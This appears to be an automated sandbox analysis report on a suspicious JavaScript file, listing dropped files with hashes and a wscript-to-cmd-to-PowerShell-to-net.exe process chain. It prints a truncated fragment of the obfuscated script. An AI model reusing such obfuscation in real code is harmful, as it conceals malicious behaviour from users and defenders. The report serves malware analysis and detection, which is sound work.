SHA-256: | 92D0E1AA6CB01BE104FFA891332A72C88A99849690535C5C1D1C28DF912DB538 |
SHA-512: | 30E63DE267267C665BE236FDF5672CA508ED1675CACC354F4A66E93CBE8FD7743F9B250911F11307A46ABB841AEF3FE5B27C569C88DB65ED686C967D2A51430D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.282474048320229 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBAQFzpAUNvO4WsGiIPEeOF0YwM6qoAvJfYdPeUkwRe9:YvXKXB3tAUwbsdTeO5eGg8Ukee9 |
MD5: | 2B05308A69E7CE831FB2F8A58B6DF4A2 |
SHA1: | 85BD31D367D94F46B90BCB0CADC466AF22CA99EA |
SHA-256: | 7F961F2395BBAE5FF2CEF3695389E38F0D16F5A6A17696796C35794E81658FB1 |
SHA-512: | 350B3867F0EAC924B3DDC741F450AC296A6075C16A6406ED17DF41AEB7CA712EBE2502156078108C7BD1463691477AFCF1B62234E574756E3A30AD6050A38B9B |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.2687972192762444 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBAQFzpAUNvO4WsGiIPEeOF0YwM6qoAvJf+dPeUkwRe9:YvXKXB3tAUwbsdTeO5eG28Ukee9 |
MD5: | 0651318121EF751A0F3DBEFF3E6D1747 |
SHA1: | 3D6E21A9D2F1D8AF20BD270F7C78CA8354866F2C |
SHA-256: | 43E7C97CD98BBEC2479A8B0BDB26C6E9C0541E6C62ECD8AF77B1B83403C00770 |
SHA-512: | 8F777A5631628994CAA3443DF407BA6516C7899DD8CF506655739D58B89A61FBEF0689161851C49DF5DA474E381E816A7F668AE166503E721FE07516906A0655 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.2661415992702425 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBAQFzpAUNvO4WsGiIPEeOF0YwM6qoAvJfbPtdPeUkwRe9:YvXKXB3tAUwbsdTeO5eGDV8Ukee9 |
MD5: | 5CEFFC3894F645F9D17E68B31378D566 |
SHA1: | A7130DB803E53234F7B03196054F9F0E04D09425 |
SHA-256: | 1656F1F7C56FF83A5AC096D15C54887FB96A7DC18DFEBF9C923E758971362ED0 |
SHA-512: | C91D63DF6B1623CCADB0BBC96361D3A41DE8D592619D4E933297D287FAA8B0C699F7B60B2E0E89EB8FDAE45F0721A3A8872D9C2E4C4AF2D255DEB20A47452B4C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.270550466562863 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBAQFzpAUNvO4WsGiIPEeOF0YwM6qoAvJf21rPeUkwRe9:YvXKXB3tAUwbsdTeO5eG+16Ukee9 |
MD5: | 1CC4244033FB3B622C4E0B78DFAFA034 |
SHA1: | EF395A9F2EDB63D4FB0524B5E0E1DFC953428089 |
SHA-256: | 98A365CCABFBEDBE31CE1D262CAF16F157CA8F0418791B56802CDB62A05D74C2 |
SHA-512: | 9948CC5C91E4A6B4324006D80EC052264A7B0AA3AE32E811F1CB14684B537D9D30DE4CAD98C083B5972D71EF628B19B57AB23B550F6B29A6D33A5B763DD90B30 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.662450407080122 |
Encrypted: | false |
SSDEEP: | 24:Yv6XBCUwmeO5LamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSU1:YvECUTeabBgkDMUJUAh8cvMU1 |
MD5: | A8FB3D9AA675E2CA6B2133BAF67796A1 |
SHA1: | ACB9014C1570CC5969D205B88F4C19F16F665D1B |
SHA-256: | CA5037E2052CB8CDB42EBDA351C59D771935419AA5E7FD0750BC6412407155D9 |
SHA-512: | E1E4410B5FB865B00248CCC0A9EEB4CA93F437DE1A115D6AB79669513B01C00B5B927D292C1369B07188FE4048CCE0299F680FA332CAD096140765D1B0530EE1 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.247426207566 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBAQFzpAUNvO4WsGiIPEeOF0YwM6qoAvJfshHHrPeUkwRe9:YvXKXB3tAUwbsdTeO5eGUUUkee9 |
MD5: | 8B8CBFC1FFCC18E065B21E8E6001B926 |
SHA1: | AEE388DD599B66EB34801BBCF4E7B9E1E2D9A975 |
SHA-256: | 4D8B698D788DD3C02C18401EEECD6F3FDF9A87B54D8543B4939BFE5514EF2A77 |
SHA-512: | 9EAF1306C06A10344B44B24C6ECC3DCF956BFB1D082CD458928909F9C67B34E597A20624795356BE936EF876919998BFA4B743C2C5E75AAD8824037F50B5CFCB |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.267497184772331 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBAQFzpAUNvO4WsGiIPEeOF0YwM6qoAvJTqgFCrPeUkwRe9:YvXKXB3tAUwbsdTeO5eGTq16Ukee9 |
MD5: | FCAF2276D1BE1549B60C06A08D3CF33B |
SHA1: | 15D178A65D4799D9E7C5B7D60880E5C9A8FD6C06 |
SHA-256: | 50AC47F598F0646E560D6273210C3AF9B5279167EF523ED3F8E631C8BDBCA6D2 |
SHA-512: | C9021DAC87846ACCC62BEED38480A78CB393E49FB4A9379FF9372B3630A9077DEE04DBFA9F23D3620355A5BB9FBBB7665B6F9662F4747FF024A4748B0994BEB1 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.117248711368765 |
Encrypted: | false |
SSDEEP: | 24:YjE3Wa/ayi3Jr/aZruUY3eR3Eymfj5xx72j0S4P0YzS2YP2LS4hC3OPJNAzgE5GB:YjpurH+Dx7IZPjPKoORN4YAh9i |
MD5: | A0C22F335F692F9F22B871AD394D368C |
SHA1: | 096522259D3F37F5A12CAA4A0589E673863EC192 |
SHA-256: | 99341741EEFD175699EB17D8B9DB3EA9ED820507BA2632E2737F7B38BF2D1B4A |
SHA-512: | 2AD42DC4384625857F0A7CB3878C4BDDA39CDFC4F8DABAC1DBF7E4743D7A98E2A2DE67F446F18E428CFCCC7555DC8CCB09E3355A7D09C94D53362755E6D22514 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.4545391138595347 |
Encrypted: | false |
SSDEEP: | 48:TGufl2GL7msCvrBd6dHtbGIbPe0K3+fDy2dsqlf:lNVmsw3SHtbDbPe0K3+fDZdZ |
MD5: | 39E17CB074D31D2142220688A0D1F41C |
SHA1: | 19781F9DDDEA444CB196220389AB2EFCDD3E0F25 |
SHA-256: | 30A64DD19C20DE66E4059020264661145916586EA764F0413A10FFA3B50A6874 |
SHA-512: | A258E80D254A2A6B972F9F69D8D77EF3DA4B27BD489CF711DEE64D56ABF7ECEE171BB382BF5B90FDDEA915E596ECC42E6785BBF1994548BB9B700E0CCDCA4112 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.9591188083826752 |
Encrypted: | false |
SSDEEP: | 48:7MBrvrBd6dHtbGIbPe0K3+fDy2dsTaqFl2GL7msj:743SHtbDbPe0K3+fDZdrKVmsj |
MD5: | 070C915A64EA1A309490C1430CF0A176 |
SHA1: | 460AE46816DF54E008A1B758C74572D00B47EFDD |
SHA-256: | 0E7BC5FA5EE77CE9A01928B559BA047E21373D6E89945B50B343F2461E6452FB |
SHA-512: | C14848CE946532E216C483CFB95F88164771685339E2C378B85B3C09E78E0CF13B4166B8754E578D7AE7BE40747E59D09B93A812BA52D0260DFAE85EA4F16ED7 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEgm6JOH+uJc3VtU5fF70xci/Yyu:6a6TZ44ADEY+uS3VcfEcgK |
MD5: | F9ACDE3387D9C13946EB580628B3DB2E |
SHA1: | 02D10AAD8148F74644A70A1E1947056C903DA462 |
SHA-256: | 23974A63D2A3B58DF6DD077CC0F0ED964B995729349FAD738B66C734D828CD29 |
SHA-512: | 12056F2ED19249CC4F89DAD6201C0FF0FE61E28CCAC327901DC24232370861C6B3CD244997EFA5D35212804B1B6ECFB72FE19FD6E8EDBBD95008B540FE94B373 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:NlllulVmdtZ:NllUM |
MD5: | 013016A37665E1E37F0A3576A8EC8324 |
SHA1: | 260F55EC88E3C4D384658F3C18C7FDEF202E47DD |
SHA-256: | 20C6A3C78E9B98F92B0F0AA8C338FF0BAC1312CBBFE5E65D4C940B828AC92FD8 |
SHA-512: | 99063E180730047A4408E3EF8ABBE1C53DEC1DF04469DFA98666308F60F8E35DEBF7E32066FE0DD1055E1181167061B3512EEE4FE72D0CD3D174E3378BA62ED8 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.5162684137903053 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8EebClLBH:Qw946cPbiOxDlbYnuRK+bg |
MD5: | 603BCEB85E3D399875CE31495CEA3AAE |
SHA1: | 8F8ACED05CFD6AFA9247189C78E0E483C8A8CCE0 |
SHA-256: | 1ED67BD0890D9F635EE342191326DC081318087BAEDAF91AD5DED296A7F781E1 |
SHA-512: | 9E419B47E907B0B2BF05526B0CA95F415AEF60331A668A40DAB1356C005EA6A4E03D327C56A2EB3D41F2C9B839C4B4F4E1F37CBCCCD75FCDE1C16568C6AFE195 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-10 23-34-10-894.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.386483451061953 |
Encrypted: | false |
SSDEEP: | 384:A2+jkjVj8jujXj+jPjghjKj0jLjmF/FRFO7t75NsXNsbNsgNssNsNNsaNsliNsTY:AXg5IqTS7Mh+oXChrYhFiQHXiz1W60ID |
MD5: | F49CA270724D610D1589E217EA78D6D1 |
SHA1: | 22D43D4BB9BDC1D1DEA734399D2D71E264AA3DD3 |
SHA-256: | D2FFBB2EF8FCE09991C2EFAA91B6784497E8C55845807468A3385CF6029A2F8D |
SHA-512: | 181B42465DE41E298329CBEB80181CBAB77CFD1701DBA31E61B2180B483BC35E2EFAFFA14C98F1ED0EDDE67F997EE4219C5318CE846BB0116A908FB2EAB61D29 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15114 |
Entropy (8bit): | 5.369493735081239 |
Encrypted: | false |
SSDEEP: | 384:QAWhShJhChChlC8zCpCsCsCLC5Cg2C9CAC6sTs5dzd5ySyKy/yKyMVFaF2FsjCC6:tKu |
MD5: | F6BA3C4CC705B927802A05D09B1F7039 |
SHA1: | 39367AD3A9696D286606C64C121ABBE136A1B36D |
SHA-256: | 4FA7F77367FF2E12292DCF9349BAFE4D7E9953989C8460CB2F745CC822803810 |
SHA-512: | 2F27FD108B8AC0D42F8128941C4833656AE9278BB50529E507C61F40D48E68AEF297D3655F226F2E850120B6B102AD535B3AFFCBF3575BA1312BF8031EBA332C |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 35721 |
Entropy (8bit): | 5.408790432326691 |
Encrypted: | false |
SSDEEP: | 768:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRldy0+AyxkHBDgRh9gRDG:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRw |
MD5: | 3EC44FFD72E67BE0972E8F769915B9F8 |
SHA1: | E3E81D23F1C4946E2F4F4C068A296C08A7CD4116 |
SHA-256: | CA6F7B8E8BBA2DD0A3689ED95920337C5B38DAAFA9B13F90ACB12C2B0716CCF9 |
SHA-512: | 73909E77912A44D9A4F5EE587BCD2BAECF4D9DFED14A391F08F8197EABEA76EFA650763127B8A661D5F8F361A01194D4E81398AC4746B2B67EF32139F05E4BAF |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 3A49135134665364308390AC398006F1 |
SHA1: | 28EF4CE5690BF8A9E048AF7D30688120DAC6F126 |
SHA-256: | D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B |
SHA-512: | BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/rKdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07tOWL07oYGZQeYIGNPB:Ta3mlind9i4ufFXpAXkrfUs0kWLxYGZQ |
MD5: | 81778DB3CD3E202CD8FEB47572C9DF55 |
SHA1: | A030EAB46FE2ED66D14270A86F44303F0D742019 |
SHA-256: | 2E4A0CE023C75E0A53D82D4D08DC4ACD144039D04CEA94103C26535CB5B56998 |
SHA-512: | 97BFD23BD03D6E911059092ED0C44779588CE29AE31E8FA1510A7FEE2B92B9E07AE2FFD4614D2566D369E48554269DC95DE42E062E533A4AA5EEC4DBAAAD3D1B |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:/xTwYIGNPzWL07oYGZfPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JTwZG5WLxYGZn3mlind9i4ufFXpAXkru |
MD5: | E88AC53FE29BDF9402BCF11696989153 |
SHA1: | EC950FE1C9ABBFB3713A082FC43B451A7F1A708F |
SHA-256: | EB1E6D431D432B488F5B17DD7806ED04260E4A37264F282367F02C466A98327C |
SHA-512: | A08590B0F5C1F281046A9E9D03A481758991E8C9CA2A96B8F59644C182F9D6EC81E9834FEF46FB3B27074EE8605C5AED79AB30957AFCB7A2734AD5018CB5C502 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.913217430067727 |
TrID: | |
File name: | 158324772041924674.js |
File size: | 20'892 bytes |
MD5: | c094584a990fe9e1f37daf355cdfa30c |
SHA1: | 5d7890613553360163cf2f0d1b6ef635d643b189 |
SHA256: | eced7b00fed1fbd0a0df0580140049be477a409be47a0b287572afe08c9e241e |
SHA512: | e4f566381f2a40cdbda73efdbab545c024785999c74009e030f52f74b59ea57d8e28288898ab3feeb6ce8dd646124001e15065ec4027867f42997460c011bcd4 |
SSDEEP: | 384:7G3EUNefksQlpPEr5KwNsN6OpugdPRBNWrPtAbw3tEpDw2erOn5wXkX2WMwOiJ2+:7pSDwbOn5wg2WMwOiJ2+ |
TLSH: | D59284C6CA3A863686E871F8BEDE6DD7736D11684E2241432C82C4CB157053AA2FD1FC |
File Content Preview: | function xhfar(){dnttp=[1031,3079,5127,4103,2055,3072];var vjuzmm=this[aiplly+fjaula+agdpd+olqfbogf+bugexgzr+qbhttybpq+hmcqz+teyiogi](this[ocyxxxv+fsmvwzl+qovowshx+agdpd+eyuanyifu+aiplly+teyiogi][habqyl+agdpd+bugexgzr+fjaula+teyiogi+bugexgzr+vbmep+sxcbeav |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 23:34:02 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff75f120000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 23:34:02 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff682660000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 23:34:02 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff75da10000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 23:34:02 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff741d30000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 11 |
Start time: | 23:34:07 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff702560000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 12 |
Start time: | 23:34:07 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff682660000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 13 |
Start time: | 23:34:07 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7b2bb0000 |
File size: | 59'904 bytes |
